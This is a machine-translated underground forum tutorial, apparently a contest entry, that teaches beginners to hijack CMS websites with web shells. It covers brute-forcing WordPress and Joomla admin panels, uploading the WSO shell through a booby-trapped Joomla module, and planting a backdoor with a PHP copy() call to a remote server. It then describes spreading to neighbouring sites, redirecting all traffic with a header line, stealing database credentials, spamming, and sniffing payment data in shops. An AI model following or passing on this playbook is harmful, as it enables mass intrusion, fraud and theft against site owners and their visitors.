For a long time I was going to scribble something on the forum, and then the competition gave an occasion. With this article, I begin my three-volume cycle of fables for complete beginners from the world of shadow Internet marketing. All the information provided is actually a full public (and like everything else), but slightly updated and chewed on the date of publication of the material. Using information in its direct form will not give due pleasure, but it will show a basic result.
In my articles there is no and there will not be a loot button, only general information is given here for self-development in our strange sphere. But with a competent approach, let the seeker find his own. From the pros - such information never dies.
Since a lot of technical information is offered, but you can’t guess for everything, sudden problems, pitfalls, etc. are possible with your implementation. It is better to write such incidents in the comments, for the benefit of the development of the forum, for which everything is planned. In addition, the provided software will certainly make antiviruses worry, and if you handle it unreasonably, your nerves will also pat, and nerve cells will not be restored. Therefore, please use virtual machines and left hosting. If anything, I warned.
We stock up on tea, because multibukaf is expected. Go.
PS I tried as easy as that.
What is shell?
The first article will be devoted to "shells." The topic is not directly related to the karzha, but during the spin-up of the idea one way or another contributes to its development. If something like this does not belong here, and I don’t understand something, we unsubscribe and we will correct it. In any case, specialists in this area are always needed by the market, not to mention their personal benefits. The article is designed for complete zeros, seasoned hackers can, grinning, pass by or help beginners with their competent answers.
So, the shell - in short, this is a script uploaded to someone else's site (more precisely, to the server / hosting), allowing you to take control of it. Management functions mainly depend on available rights, server capabilities and your imagination. We’ll talk about the practical application of this venture towards the end.
How many people, so many opinions, so there are a lot of software implementations of shells. From here for consideration today we take only one (but one of the most popular) - WSO.
You can download it here -
Shell is launched by the usual choice of a script indicating the configured GET parameter (see the address bar and the “www” parameter). It looks something like this (antivirus is already nervous):
If you look at it, it’s functionality from the basic file manager, the built-in database editor, the FTP brighter, to the self-destruct button and executing commands on the server. Enough for our purposes. Some of these functions will be considered in practical use.
To whom such a shell does not like or does not fit - if desired and skills, everything can be finished / sawn over again. Beginning techies at the end will give a recommendation for a source of compressed information in the field of technical web development. In the meantime, we move on.
Where do the shells come from?
We will not consider the option of buying a shell - after all, most of this text is not read for this, but is still looking for, if not a button, then a scoop with dough. We will do everything ourselves. There are a lot of ways to get shells. In fact, this is one of the ensuing hacking penetration art, hence all methods are divided into point and mass.
For targeted penetration into the target object, they mainly use brute, phishing, access to mail, a scan for vulnerabilities of all levels, SI. For mass access - brute, botnet, exploitation of ready-made vulnerabilities. But the methods themselves and their variations can be invented until the end of the world (if this is expected).
The topic of targeted penetration into a single object is certainly interesting, but I want it all at once, and more. Therefore, for familiarization, we will mine in quantity. We will postpone vulnerabilities for later. Here we will work with brutus.
In theory, more than half of all Internet sites are created not from scratch, but on ready-made control systems (CMS, engines). Not excluding this resource. You can check the site’s affiliation with a particular system, and at the same time get acquainted with their diversity, for example, here - .
For any CMS, for convenient management, there is an admin panel, which we will brute here. Those. first, we will access the panel, and only then, using its capabilities, we will load the shell. It’s longer and shorter than with vulnerabilities, but it is efficiently and also subject to automation, and most importantly, it’s usual for fans to twist a stick.
Total for getting shells we need:
List of domains for brute
Base of logins and passwords
Knowledge in engines or working head
Offtopic for those who know how to merge databases - you can skip the text, to gain access to the admin panel it’s enough to restore the administrator’s password in the database or give your user the necessary rights if it does not allow the file to be downloaded directly.
Where to get domain lists?
If you want to make a selection of domains of a particular topic or for a specific CMS, then it is easier to use well-known search engines and a parser for them (for example, the same Selka) or process WHOIS. In our case, we will not bother and pump out the domain base from somewhere. For example:
use the database only for tests, it won’t work for fruitful work after age.
Search admin area
To start the admin admin brute, you first need to find these same admin panels for a specific CMS, sorting through the original list of domains. There are a lot of signs of defining a specific CMS (sometimes up to a version), you can google it for a specific project if you wish. For example, the most popular ones are:
Wordpress: site / wp-login.php
Joomla: site / administrator / index.php
Many ready-made harvesters for brutus themselves already can sort domains into admin pages, so it will be in our case. We will not dwell in detail, but for those who are going to write their bruts - a note.
Logins and Passwords
By logins - lists of logins can vary greatly depending on the working country, we think for ourselves. The main ones are admin and administrator .
Passwords are harder. Too many passwords affect the gross speed, passwords also depend on the country. The method that I use not only for this task:
We take the login database: pass
Allocate pure passes from it
We write a simple script in SQL to group passwords and count their number
Top most used
In order for the article to be useful to everyone, I post the passwords obtained in this way. The result will be at least some guaranteed. Those who are resourceful in this collection, for example, will easily calculate the country of the donor.
But for the fastest effect, simply working out the admin-admin pair is also suitable .
We begin to brute
Bruteurs in this area too much. From combines and specialized for single CMS, to the use of the same Keeper projects and Kali tools. For review, I post the first combine from the public (popular Wordpress and Joomla still do). Taken in haste, it can work crookedly, it can tune admin panels to someone, but that's not the point - for a general understanding, a product from public is suitable. Those who have killed laziness and developed a plan will leave to make their decisions, here I am only going to arouse the interest of beginners. Download the
program here -
General view of the brut:
The interface is much simpler than Anti-Detect - we load the database, logins, passwords, set reasonable streams (it is more accurate with the streams). We press the start and forget about the existence of this program for about a day.
At the end, the program will display the number of admins found, twinned admins and flooded shells. We’ll talk about the latter a bit later.
Although the article is about shells, happiness is not in them alone. Successfully twisted admin panel can benefit without shell. We will use Netpeak Checker to evaluate our catch. The program is freely available, for many it is familiar with the recommendations for dropping out shops at the stages before driving.
The picture didn’t catch anything special, but with a large number of admin panels it’s nice to work at first with something fatter - high traffic, PR, age, shops.
Filling the shells
Access to the admin panel may be enough for our tasks, but sometimes you need to "get it." For this, the shell is uploaded to the server. In this method, the shell is poured through the admin panel, usually through the modules / plugins of the engine itself. You can fill in with your hands or automatically (for example, through ZennoPoster). In our case, the combine itself is trying to fill the shell. But breaking through an automated method is always less than manual, hence it is better to work with hands with especially fat domains or with a modest brute.
For example, the process of filling the shell through the module in the latest version of Joomla.
1. Download the module with the flooded shell.
2. Install the module through the panel (the panel is Russian, because I show it on the local server): 3. Go to the shell at:
VashSayt / modules / mod_jxtc_newspro / helper_res.php? Www
For each CMS, the method will be different, but the essence is the same everywhere - where you can fill in something with the executable, you can fill in and shell. As an addition, according to the old database above, some sites have already been processed to us, but the part of the sites that did not give in to auto-filling, went to us safe and sound. This is to the fact that on the general field, you can grab your own.
Working with the shell
To understand the functionality of the shell, it is better to touch everything with your own hands. In fact, everything depends on a specific task, and you don’t need to know everything. I leave this point to the reader.
I will stop at this stage on the nuances.
First, discuss the propagation of shells. They themselves cannot reproduce without us, but with a certain amount of luck and understanding from one site with a shell, several sites with shells can be made. Hosting providers usually close this opportunity, but in some places it is available without dancing with tambourines. Therefore, it is worth a try.
We draw attention to these 2 points of the shell file manager:
For those unfamiliar with Unix systems - clicking on them will throw them up one level. Having reached the root of the site, this feature will either not be available, or a list of other sites of the same user will open, and even worse the whole server:
And having thus obtained access to other sites, you can multiply there.
The second point of this part is the creation of a backdoor. Perhaps the cunning site administrator will somehow decide to remove our shell. But we must be ready for everything. Therefore, at the time of access to the file system - do not forget to fill in some script to restore access. As an example, copying a file from a remote server using php.
<? php copy ('
We will not go deeper, those who wish to read are optional because problems with rights and options for execution are possible.
A fun farm
Sooner or later, shells breed to a state where it is difficult to follow them with their hands alone. To simplify the process, developers came up with different shell managers. I present one of the options here:
The solution is not the most convenient - execution in PHP, the functionality is outdated in some places, but it is quite enough for familiarization. The usual functionality of such managers is a mass check for validation, loading backdoors, multiplying, downloading files, executing commands. There are options for Win.
And now we come to the most important part of the article - but why is all this necessary? Since for each point of application several more similar articles can be painted, and even more in variations with specific tasks, here we consider the application only in general terms, leaving attention to decent nuances.
Poking around at the site file system level, we can conveniently use the server as our file storage, store our sites (the same doorways), confirm ownership of the domain, simply find interesting and valuable files up to the connection data to payment systems, pump out site dumps. Application depends on the imagination.
Having written the following code in the site root in the index.php file:
header ('Location: YourSite');
You can drain all the traffic to yourself. Of course, no one does this in this form - in the worst case, they single out mobile devices separately, ideally merge small fractions with an additional definition of the users of the site’s core, so that the design lasts as long as possible. But the bottom line - getting traffic opens a new chapter in its monetization, which you can talk about another time.
Access to the database
For a site, storing the settings for access to its database in the clear in the root of the site is a common thing. From here, having access to files, you can access the database. And there at least you can merge the login-pass base.
Proxies on sites are not the best solution, but for the elite it is also possible. One of the programs:
Most likely it is also in the public domain, but just in case I’ll attach it - VPSProxy. The gate.php file is sent to the server, in the program settings we specify the path to the gate, password and encryption key. The program picks up the server on the local machine, to the port of which we connect with the proxy (http - 2222, https - 2223).
SEO links The
eternal place of the excitement of SEOs is to build up the external link mass of the site and the debate about its impact on the ranking. Shell does not provide an opportunity to accurately evaluate the search engine ranking algorithm by the link factor, but it makes it possible to stick a link from fat resources just in case, saving a little. Link of course visually hides. Links live happily ever after. Example (generated on the local server):
We draw attention to the text "French cuisine" and the code inspector with a link to Yandex.
Trafficking in a slammed site allows you to place ads - from the banal Adsense, to underground exchanges of links, teasers, pop-ups and other rubbish. Again, the topic of volume for a couple of such articles. And you can try and screw the same Adsense, the topic was on the forum.
You could leave a headline like “Spam by e-mail”, but the word “relays” just looks beautiful. In short, it is basic using php from the server you can send letters with the function <php mail (1, 2, 3, 4); ?>. There are programs that automate this activity. In my time, AMS Enterprise was the most popular. In the public, I did not see his version with relays, and later went to the mailing lists with VPS with signatures (now I do not spam). But I had to use it - it works. Now, perhaps, there are working alternatives.
Having the shell of an online store, the list of higher-level actions can be expanded to manage order status, gift removal, sniffing and substitution of payment systems. About sniffing, by the way, a competition article is already presented on the forum. Interested in helping:
For those who have not found anything interesting above, and even more so do not want to look for more shell based serious fraud, shell as a material can always be sold to those who do something with them.
That's all in general. Further searches go to the side of working with mass and point vulnerabilities of sites, working with traffic, botnets - there are enough ways for development for everyone, there would be a desire. In the meantime, this concludes the article.
Bearbeitet von Zero00m, 15 Oktober 2019 - 15:09 Uhr.